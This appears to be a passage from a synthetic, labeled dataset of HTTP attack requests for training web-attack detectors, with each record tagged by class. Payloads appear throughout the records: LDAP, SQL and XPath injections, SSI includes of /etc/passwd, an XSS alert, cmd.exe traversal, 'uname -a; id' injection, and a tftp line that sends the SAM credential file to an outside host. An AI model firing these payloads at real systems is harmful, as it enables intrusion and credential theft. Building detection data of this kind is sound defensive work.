If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: "Kdd16RWG6ofbBQIF"
Max-Forwards: 680
MIME-Version: 2.6
Pragma: i30cor=aaP5NEe
Proxy-Authorization: Digest response="8a53FcC7Ddbc193e48E8D78D14E7FaAD"
Authorization: Digest username="6yeim"
Range: 08647-744
Referer: http://srsat.st/femkaetN/tiadei/epeudg/5sdosiod/Ue4Bmtf.doc
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.2 (compatible; 6Brcawgnob; SunOS sun4u; ocErF; nN0Aa)
UA-CPU: PowerPC
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 881x134
Via: 0.7 www.9hNxHtaa.gif, eos/2.0 www.ehqey.gif:8
Transfer-Encoding: compress
X-Forwarded-For: 249.181.31.217
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43586
Start - Id: 37500
class: LdapInjection
GET /sA1v/DF9x/yFwTb7Q5Cts_z/spUPt/sbdmbDvHbI7-EBl-oJ/tbDtpunAl/6nHba/@k/s55dURmAkmby/a5rdr/ysa4vxy5RphY/SCZxml90kDQR9.cgi?4hs=s%40Un3&eue0vDsewlgh=cEelnceiTin%27N&ZKzerY6YWAt=Ej%40iLdu%26&sN9nlentz4=08414614&S76v=e-sBvD01e&neltsa=eygCxaDvKEa9&ron2b=tnsirenrA&to6tsfnctiIs=8954&ils=s%24%5Det3%3Drrdowheresoko&5oyjneMtbosf=38836053 HTTP/1.0
Host: www.irhA.gov
Connection: keep-alive
Accept: text/html;q=0.3, application/*
Accept-Charset: windows-1251, x-mac-turkish, iso-8859-4;q=0.6, iso-8859-7;q=0.4, x-mac-korean
Accept-Encoding: compress;q=0.9, deflate, deflate, gzip
Accept-Language: *;q=0.3
Cache-Control: ml0ee=2
Client-ip: 144.190.44.44
Cookie: feaageGtoo=gs)(|    (tHi58=*);rlnmA4qttq=rrtmpne;Dbekom=54;onmiotgll9ue8e=lTr;0hecRo=t+ef
Date: Thu, 08 Mar 07 22:14:15 CET
Expect: 100-continue
From: G0Tehr7@TrsnATrdr.st
If-Modified-Since: Thu, 11 Aug 05 05:41:44 CET
If-Unmodified-Since: Fri, 08 Dec 06 05:19:46 UTC
If-Match: *
Max-Forwards: 9
Range: -02377,787126-
Referer: http://ldeae.fr/beiga/enugLwa/afeie/sq13dlE.asmx
User-Agent: nelrnzne (tUio15yLQ)
Via: 7.7 www.wizn.gif, 7.8 www.eaWj.html
X-Serial-Number: 222207

null

End - Id: 37500
Start - Id: 36623
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ru9q.org
Connection: ntaee
Accept: image/jpeg
Accept-Charset: cp-950;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 107.48.3.140
Cookie: 4eehbsjroI0nD=ksQ
Cookie2: $Version="2"
Date: Sun, 13 Apr 08 11:09:25 GMT
ETag: "zWK@khPcwyjwc74KjL"
Expect: 100-continue
From: W3ut@uHnouuou.it
If-Modified-Since: Fri, 01 Jan 10 08:05:58 CET
If-Unmodified-Since: Sat, 03 Mar 07 16:07:00 GMT
If-Match: *
If-None-Match: *
If-Range: "HXDma@QQVcMyQKl"
Max-Forwards: 1400
MIME-Version: 2.7
Pragma: aastt='ryrw'
Proxy-Authorization: Digest qop=auth-int
Authorization: tDus rndeoby=anuya
Range: -8,4-,75-7
Referer: http://n7rop8ae.be/e2llbeo/3scriitt/oiHRev.mp3
TE: gzip
Trailer: TE
User-Agent: Mozilla/8.1 (compatible; MSIE 9.3; SunOS sun4u; arett; I1feben; 2emo)
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: cetahi/2.2 102.63.138.220, 5.4 www.lTveiTt.gif, aOAE/2.1 www.Aiieouo.jpeg:5
Transfer-Encoding: compress
Upgrade: tweo/0.1, sfyot5/8.5
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36623
Start - Id: 39353
class: SSI
GET /r_YDWKITU/rsUihlraodann/ociofsk7hae/stjyhoUQA-7jwHI2LN/peiiolaeay4a/l9-GoFd/o4yEAvT02A-dbYOz/IRj5jiyocatlikeIASn4.php?qyrtl=mbsk&pifbila3sdefw=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&tUoOarlfT=%3B%7C+3ihoxscphp%3Fr&lK5=egnesnesn9ei&oaoOicteyxEjr=iMxHy&P3ncgCeV=-Egnj+gaftpRt5H&woOaiwIety=%26beEgoiw9mj&ude=e9yb462&jniiSser=57012476 HTTP/1.1
Host: 10.240.64.230
Connection: idrth08
Accept: image/*;q=0.6, application/rtf
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oenein-h;q=0.5, ePRtiNiH-3eoii;q=0.9, ghhauo2g-rm
Cache-Control: no-cache
Client-ip: 183.110.148.152
Cookie: AneceNt3=boot.ini-y2tE o'O0etelswhere/n;ulaen3cey=8c'sscwgety:liframeAMrdo]T;ThzBtaie=055;p98=dNQB;heowsndjet=g
Cookie2: $Version="50"
Date: Fri, 23 Apr 10 23:40:07 GMT
ETag: "hE3qibyPdfyYH21sJ"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Sun, 26 Nov 06 07:23:42 GMT
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: *
Max-Forwards: 07
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Digest nc=F32b9aa9
Range: 1-35,9436-,-246816
Referer: http://mdDn.net/4rAEn/lrttag2n/eptat7i/f1fhbO.jpeg
TE: trailers
Trailer: Host
User-Agent: eHgab (8R54l5CH0@)
UA-CPU: 68000
UA-Disp: 9327,7903,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5277x2991
Via: gfpEe/5.9 www.2pia3ra.jpeg, OoPUYa/3.6 213.183.54.18:8
Transfer-Encoding: teee
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 802337450581
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39353
Start - Id: 41749
class: SqlInjection
GET /drctstnynte/uwdm9IDa/oahueutsth4se/Tattgx/7s.shtml?vK0rFe=%27+++%2F**%2F++OR++++%2F**%2F%27%27%3D+%27 HTTP/1.0
Host: 68.135.165.176:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.2
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 122.67.58.101
Cookie: Angr62iado=tta;i4heotit7Eaua=244287;7riilaah=ybdenii 8uost;eaon=eQsv7rJ3is;cer1u4oemearals=t8l
Cookie2: $Version="873"
Date: Wed, 03 May 06 05:37:04 UTC
ETag: "UVxosaB2xCH2mpUKt0jR"
Expect: crar=tsunz
From: lehFo@eioiwni.cz
If-Modified-Since: Fri, 07 Oct 05 13:06:57 CET
If-Unmodified-Since: Sun, 24 Dec 06 16:24:38 CET
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: *
If-Range: Fri, 24 Mar 06 20:06:15 UTC
Max-Forwards: 68
MIME-Version: 8.7
Pragma: z='qteMeon'
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: NTLM Z2JmYWNlNnJvdzJydGU1NWhTdG9tZXRtYXloc2h0bWU0ZWJoYXZl
Range: -69404,-1
Referer: /raoeotl1/rhAr/rsbac/ixeihe.msf
TE: gzip;q=0.0,chunked;q=0.3
Trailer: Cache-Control
User-Agent: cs9weeoH4aaywor
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0666x357
Via: 7.9 196.238.32.197:509, HTTP/3.9 www.crce2gw.gif
Transfer-Encoding: compress
Upgrade: mer/2.9, hitWop/2.4, vtjw/1.7, otte/3.2
Warning: 878 www.6sn3l.shtml "noyalXfnbpe" "Wed, 14 Sep 05 14:01:16 CET"
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41749
Start - Id: 47904
class: XSS
GET /DMTQmQfIhm6/gJ2SeHk5JE/n-95BzbixC5Fvq/thrrdn/5O/ESavraeaeby/ambZaAU70T5EZ1/cmdv/copyITprocessing-instructionkEN_bexec.js?@9ps86ru9GQaccess_logy=txxQshyngAvio&tduzcxamo1e8n=tein6riuxnullnanc&e5ifrt=%3AhI+&ymsy=%3Cimg+++++src%3D++%22atasneve++++%22onmouseover+++%3D++%22++%5Balert+%28%27bitm%27%29%3B%5D+++%22+%3E&hlegrlppz=8926&rh=oeeHussr%28as+fena4nt&55WinYeZQusrLperl=eedwonsoeaaaitsdhe&uPufD=06628787&rvf8=t0znFnn6eiaelelocation&tti=vre+dtaOttj&fik=7anwr5connecttj%7CancsGtFsy&roeikanfdNtnr=s2n5mteluRy&om2gtrrceeeaot=sra+i&hfehmnntw83otas=u8y HTTP/1.0
Host: 231.202.3.205
Connection: Tie4
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: 3nSuhQo-8atw
Cache-Control: no-transform
Client-ip: 102.67.104.5
Cookie: oRcEaemmgoeeo=9501;MoluRpB=tuP5;o8neia9lpere=dtNals<tpoyamixtau;eDhtE=yr;2eueoHhoIhoetwe=595953;ks9rse1b=Pbgsounda>e echoto2tr
Cookie2: $Version="04"
Date: Fri, 06 Jun 08 21:21:43 UTC
ETag: "ifdVZPaP60cBTA8HNdjF"
Expect: reeofnse
From: rigu@deao.net
If-Modified-Since: Sat, 15 Mar 08 09:31:48 CET
If-Unmodified-Since: Sat, 17 Sep 05 24:32:39 CET
If-Match: *
If-None-Match: *
If-Range: "JRA3Z@PzKBKNJHK7pU"
Max-Forwards: 4913
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest algorithm=MD5
Range: 53066-01
Referer: http://www.ehr1r.cz/aieR/sErare/roce/oGrsrn.pdf
TE: trailers
Trailer: Authorization
User-Agent: wsre/9.8
UA-CPU: x86
UA-Disp: 213,2027,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 229x467
Via: 6.8 106.134.189.19, 2.8 www.rhbc4.shtml, FTP/0.8 170.95.147.23
Transfer-Encoding: pRlae
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 381 1.140.125.66 "honesuvaEaeore" 
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47904
Start - Id: 44563
class: OsCommanding
PUT /meQxku.NeL@/HD8C@.exe? HTTP/1.0
Content-Length: 170
Content-Language: tv,pUx1c,9dudtonn
Content-Encoding: identity
Content-Location: http://www.ii19.it/taoeaEes/eOey.wmn
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Sep 09 16:27:59 UTC
Host: www.hoiithClj.st
Connection: keep-alive
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.6, gzip;q=0.3, identity, compress;q=0.5
Cache-Control: no-transform
Client-ip: 10.34.240.53
Date: Mon, 12 Dec 05 20:59:17 GMT
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Sat, 20 Aug 05 19:50:16 UTC
If-Unmodified-Since: Wed, 06 May 09 12:33:04 GMT
If-Match: *
If-None-Match: "p5HQVvM4FzlKqRPj5y"
Max-Forwards: 8
Pragma: no-cache
Authorization: Digest username="lTri"
Referer: /aedn.avi
User-Agent: Mozilla/6.0 (compatible; Konqueror/4.2; WinNT; raeylG0)

dihLan=%&aerwoNqc=129.45.167.18     |  tftp     -i     136.56.216.35   PUT sam._&49tRigs=eHsbBz0wrj&rahoLiotIeocEhf=heonoMecyn&objectKuYninclude=52&eelctwamh=kEGZUjL9

End - Id: 44563
Start - Id: 38010
class: LdapInjection
GET /9k3RYjC0qUy5aOA.css?ei3dn=niaoeB&FlogH4fform=eceosw8ElvU&kE62W4uCDEz=3%25e&idEt3ainY=406292&zhwwerott0T8wu1=c8idAad+Mr9phwp-p&ooddxmnsot=oLaUmA11r0G&ntsee=8519&libStNEK=drs%29%28%26%28objectClass+%3Dei*%29&yEaduti=3938818483 HTTP/1.0
Host: 75.2.9.233:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: deflate
Accept-Language: *;q=0.6
Cache-Control: max-age=869
Client-ip: 138.168.151.21
Cookie: cat_GnslYNCAupdate=9ahhnr;rtanas1Rereree=:6ut;ZtUiSG=cJVUu;Fac2Si_wfR=c6iueeednt
Cookie2: $Version="949"
Date: Mon, 06 Jul 09 04:39:02 GMT
ETag: "FpA_UeDHlRzDYzb"
Expect: hh3aseqo=ntaz3t;uStechdt=eaws
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 19 Mar 09 14:10:48 UTC
If-Unmodified-Since: Tue, 20 Oct 09 06:35:53 GMT
If-Match: *
If-None-Match: "yuFYIrDhYCpRPiOVR"
If-Range: Thu, 23 Apr 09 09:52:45 CET
Max-Forwards: 10
MIME-Version: 9.9
Pragma: dsier=iphxe
Proxy-Authorization: Digest cnonce="uskm"
Authorization: Basic dXdydDozaXNhbg==
Range: 17672-41
Referer: http://www.tiske.st/ntotn/o0xnsyis/webetspt.cfm
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.9 (X11; U; Open BSD i586 0.8; ri-ee; rv:4.6.3) Gecko/74532342
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 905x8185
Via: FTP/5.8 211.90.80.241
Transfer-Encoding: 6gsrvU
Upgrade: jrr/4.9, egaar/4.0, 1Zoc/3.1, zjwo/5.8, 95o/6.0
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38010
Start - Id: 49159
class: XPathInjection
GET /Blxenr0Nat35S/d47tJoiouias/bN/wD5TfzvRWylB/KXYGzV/sc4Itohleobnl3r7ama/.Zc/yisltTshua/9RZXrhwtdr8ME/hddhl/evwFPe7Dtkc6vtNI6pqf.gif?tMiertaHeoy=teshlLnitlibod0x&e4reluinnfrq=570&v.ZqoCYMa=stsfla&nmtu=y&mrx6p=gjw7bae&hnLmpe1idZssb=8999956177&pw5tBhsneaui0ai=83442845&hM5A=Urprocessing-instruction&1eslmgU9oEumi=sohO9cE2Ictut9ocb&oee=Tw9un%2Fal&Ysnfem=alE%2FCneny%2Fwli5%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D+++or+++++%27st%27%3D++%27&UNI.OMokImocharW=7+Ym&otso=nslt%241Z&sprenvnegisnu=uavae HTTP/1.0
Host: www.Idnjy.st
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: compress, deflate;q=0.3, gzip
Accept-Language: *;q=0.9
Cache-Control: max-stale=033
Client-ip: 38.175.250.11
Cookie: nledc=96;hle=io96RU95j
Cookie2: $Version="585"
Date: Wed, 13 Feb 08 21:52:20 GMT
ETag: "JRiumqeHdoOse.-"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Sun, 19 Sep 04 14:57:59 CET
If-Unmodified-Since: Sun, 20 Jul 08 21:57:27 GMT
If-Match: "0RYhKtFgl@DG.dlBDTr"
If-None-Match: "uLyRHl6Vyb3jBji5ZbXM"
If-Range: Thu, 05 Apr 07 18:36:57 CET
Max-Forwards: 870
MIME-Version: 5.8
Pragma: tlh='eeWzpu'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: Basic ZUV1ZGdudGU6c29vbw==
Range: -441207,31726-,-3
Referer: http://eatTm.biz/o1tkeAwc/eEait8/stnai/aenha.gif
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.1 (compatible; ityums; WinNT; ntjlfuuo6; ghhNTva; esmthnntcr)
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7758x5013
Via: 0.8 93.191.229.251, HTTP/0.5 62.35.78.138:8, FTP/3.4 167.114.68.175
Transfer-Encoding: compress
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 017399203750342
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49159
Start - Id: 43089
class: OsCommanding
GET /iwLcoitatdt7us/seytnhahkn/aaJ5rOq9WtlBv6s/OjhM/kkAq/o81@zdhCA@wT.exe?t6fNOYlogxL=6o&QAI.lN7Bs=b4ceosv&pd6ge8iitaonin=+++++%3B+++echo++++++%3B+w+++++%3B+uname++-a+++%3B++id&tbeyuirhoh=d7lwiHouj&ehoeWe28r=68082&9RAvhBpNAU=rthr%3FO%7ESdS&e0G-OyQ7=1&fonblejBfiAEbi=w6t&1ooh=67&son00nyks=sstR HTTP/1.1
Host: www.bfadksornt.fr
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: A5eRdojt-neareow;q=0.9, aedljge-e8s;q=0.8, yle3-lseaoh;q=0.6
Cache-Control: 9=vene
Client-ip: 177.244.249.24
Cookie: lkssdsTro=jxNhuWCs;aattvau=7anT;acTe0t0LaF=-aorcaHlrhgd7ue;xRp1k6fJTKG=c@Ri.bO0a;cwntDdh=yu$o;igsaoeena38ceoe=hFbm8h-XrG
Date: Tue, 04 Nov 08 16:35:02 CET
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Unmodified-Since: Sat, 06 May 06 24:30:20 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 843
Pragma: ient='i7'
Authorization: NTLM aWVkNGhlZHRlY29ubnRyTFByZWEyaWJ1c3EycnluaEFkMG9kaXpmdXI=
Referer: http://www.z6sesea.de/faci2.gif
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: niswc7ecuelste
UA-OS: Mac OS X
Via: FTP/8.2 www.iog9irtq.png
Transfer-Encoding: gzip
X-Serial-Number: 306986025864028

null

End - Id: 43089
Start - Id: 40604
class: SSI
GET /u9e20e5iae8ue1l7tsh/B1s0/499N6u/WemVx4O4Z.css?ath=6094975&tHsdaa4=yft_UlhH&qbyOrcaetfrosup=8300808&dhmtichnehlbw1=7415&WRhttpS-WtmRtelnetg=%3C%21--++++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&rtwaao0fk=25 HTTP/1.0
Host: 85.129.167.133
Connection: mearmcew
Accept: */*
Accept-Charset: utf-7;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale=9
Client-ip: 146.4.65.176
Cookie: eeet4pq=5QoAT2lFG;jdeletesfUe=aastynoG;js=qoehr;ccenha=8
Cookie2: $Version="0"
Date: Thu, 20 Apr 06 11:03:52 UTC
ETag: W/"-Vp.xW@OMQO677mJ"
Expect: 100-continue
From: q67lte@ielenft.it
If-Modified-Since: Wed, 14 Feb 07 07:04:38 GMT
If-Unmodified-Since: Thu, 11 Mar 10 18:07:43 UTC
If-Match: "0hstC8V1OR_eVE7gQ8"
If-None-Match: *
If-Range: Thu, 24 Aug 06 20:19:37 CET
Max-Forwards: 1
MIME-Version: 8.9
Pragma: oI4i='ut7iNsAa'
Proxy-Authorization: bcfrun ebAc=Lgatnzn
Authorization: sLpp optl2ev6=eorea
Range: -7,-7178,-26215
Referer: http://www.pemdau.ch/liaamop.nsf
TE: trailers,trailers,deflate
Trailer: Expect
User-Agent: Mozilla/6.8 (compatible; Konqueror/2.8; Mac OS X; s0tO; Niwnste)
UA-CPU: PowerPC
UA-Disp: 252,6478,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: 9.6 www.mn0j.js, 2.8 46.182.110.198, 7.3 www.dln4ltn.htm
Transfer-Encoding: gzip
Upgrade: crlln/8.7, m6mMa/6.8, ehdTt/0.9, Rtiaun/0.7
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 431541377
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40604
Start - Id: 44007
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: 75.4.34.228
Connection: close
Accept: audio/*;q=0.2, text/*, image/*
Accept-Charset: windows-1257, iso-10646-ucs-2, macintosh, x-mac-roman;q=0.0
Accept-Encoding: identity;q=0.6, identity, compress, identity, deflate;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 139.195.201.34
Cookie: Aio4rcnv65=cOeydiorh6ibsned;vooasnOeitlRol=s6en4idd2ntdpRmi
Cookie2: $Version="8"
Date: Sat, 01 Jul 06 16:43:09 CET
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Mon, 12 Jun 06 18:22:47 UTC
If-Unmodified-Since: Sun, 30 Jan 05 11:37:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: Pagnot=zgmeo7rn
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: ivn1d wIdh9ti=ee5z
Range: 67-764741,470518-20,3-202913
Referer: http://voix.ch/mn3sitm.tiff
TE: trailers,trailers,chunked
Trailer: Host
User-Agent: Mozilla/2.5 (compatible; Konqueror/2.6; Unix; yscOcilgut)
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: 2szzh1; Unuuuub=ml7Ith
Upgrade: rnr/0.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44007
Start - Id: 39766
class: SSI
GET /oEN_ECJLX/tV1svP.jpeg?Nisnjlig=980503&ra=4&doglmlreaD=%3C%21--+%23include++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&asdnh1ehsCete=yT5&5Y4hSmz79a=i6e8tl1%25pF+oee&rZha6eludcbt=en4oiepseeIates&Yqkt=%24styleywe HTTP/1.1
Host: 142.72.196.48
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.2, x-mac-japanese;q=0.0, gb2312, ks_c_5601-1987;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: bs0re0-xr7aitu
Cache-Control: no-store
Client-ip: 53.18.205.114
Cookie: awgrrioueon2eo=579289890;MKLiDVikR=ns;memi9ae=7267738518
Cookie2: $Version="565"
Date: Mon, 01 Sep 08 15:30:10 GMT
ETag: W/"UOethF6tldF.k9x"
Expect: sn1i
From: inatvaj@ofn6.fr
If-Modified-Since: Sat, 24 Jan 04 05:30:51 CET
If-Unmodified-Since: Fri, 18 Jul 08 04:30:07 CET
If-Match: "0BJsXYjYrZUQ6TdH"
If-None-Match: "1n9kwriSyRlpJnM-_vg"
If-Range: *
Max-Forwards: 7
MIME-Version: 5.1
Pragma: ttsiioet='reSnnuym'
Proxy-Authorization: Digest response="3FB8f7FE7A2B56D1Ebe41b8aaE2dea0f"
Authorization: m3ea a8bhgit=19sesn
Range: 42-82,601-32,-86
Referer: /mtew2r.php4
TE: gzip,trailers
Trailer: Trailer
User-Agent: hamh8@Vl http://www.gblaa.org
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 9.6 www.tiyeTta.htm
Transfer-Encoding: identity
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 306032992
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39766
Start - Id: 40457
class: SSI
GET /9SJz2TfPwejgXN/rgstNoraVnensgscsrP/aqdihgse/b9p8/etux6a5CsEeoyjo.bin?Teiiqnibsftiet=shomel6mr3Neeea&ma41hrer=ox5cxy9g0Br&TnmHoi=+3a&CWMm-H=022034&afo3=%3C%21--+++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&shoEh6uRtTc=e5soMpetLEzilr&PNA1r3=3937372&pts7r=7642928192&YdbD3SY=w1I HTTP/1.0
Host: 122.40.154.53
Connection: ntTo
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: usyettin-lehieo;q=0.7, mfurNt-osaee3r;q=0.5, gIbaA-eeeek, yloet0o8-htn3, sr-8net;q=0.8
Cache-Control: max-stale=20
Client-ip: 10.105.98.174
Cookie: li4nSw=stgy
Cookie2: $Version="7"
Date: Tue, 10 Feb 04 03:29:03 CET
ETag: W/"x7eSqqxoVuiMGV1bvV"
Expect: 100-continue
If-Modified-Since: Sun, 25 Mar 07 20:03:14 CET
If-Unmodified-Since: Thu, 17 Jun 04 20:33:56 GMT
If-Match: *
If-None-Match: "N88kgKQTqpMk_MXbL"
If-Range: Sat, 02 Jan 10 14:06:08 GMT
Max-Forwards: 5594
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM aDJydHRpRXdxdEhsZXhiaXM5dHRhOWJwc2U1aWxhcm1wbnlvdWM=
Authorization: Digest algorithm=MD5
Range: 688-12571,5864-06540,0825-1066
Referer: /mao6en/oietciS/rCeyetw/pueei/Haesrhli.msf
TE: deflate,trailers
Trailer: If-Match
User-Agent: 22RY0spbG_ http://www.nsbpf5pr.biz
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 025x185
Via: FTP/7.9 www.xtmyN.gif, efr/7.2 185.183.103.247, qrist/9.8 13.180.186.74
Transfer-Encoding: compress
Upgrade: ytiE/1.4
Warning: 218 www.tisoHb.htm "wmoeMido5" "Sun, 29 Feb 04 21:33:45 CET"
X-Forwarded-For: 109.247.28.154
X-Serial-Number: 98565372421828
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40457
Start - Id: 35824
class: XPathInjection
GET /nz88ulTZzs/etri@uDZITh7IqgZ/iotueAptha/LDyWf/u.maNJzOaQ/sStaAxrs/sagixa0p/dup9A/bGc_pbCSuuFjsU9/tsridsntyHejs/sDtLS3OGNXM0D4l-zRIe/ethTugeTTl.sh?HdQrcp7N@=6n8%27+or+++++hy%2Fcr5hd%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D987%5D++or+%270Nd%27++++%3D++++%27&aeGte=i4eehaevitp%27Iai&e9tyeYxbe=69aoQs HTTP/1.1
Host: www.oosh4wyrn.biz:7974
Connection: fobhy
Accept: image/*;q=0.9, video/*;q=0.4, audio/x-wav;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.0, gzip;q=0.7, identity, deflate
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 19.116.224.235
Cookie: 6thiu=asozUlh;nzwt=8331;wpiframem9No=694
Cookie2: $Version="2"
Date: Thu, 08 Jun 06 19:35:31 GMT
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Mon, 16 Feb 04 23:55:54 CET
If-Unmodified-Since: Mon, 27 Aug 07 21:33:03 UTC
If-Match: *
If-None-Match: "xlk8HcX8sPbfCx7"
If-Range: Thu, 08 May 08 14:51:39 GMT
Max-Forwards: 3162
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: ctrva 6eFteS=Yswi
Authorization: NTLM bGplUmlzMkU5QWhzdGVjc2lkczBmb2Vjb1VqdHFhc1MwZW5wdA==
Range: 77-,-9
Referer: http://www.o5znt.biz/inne0b/flioroin/fmb7eje0/tjja/8laafa.cfm
TE: gzip;q=0.8,gzip
Trailer: Via
User-Agent: sfewdasnWi/9.7.6.8.6
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
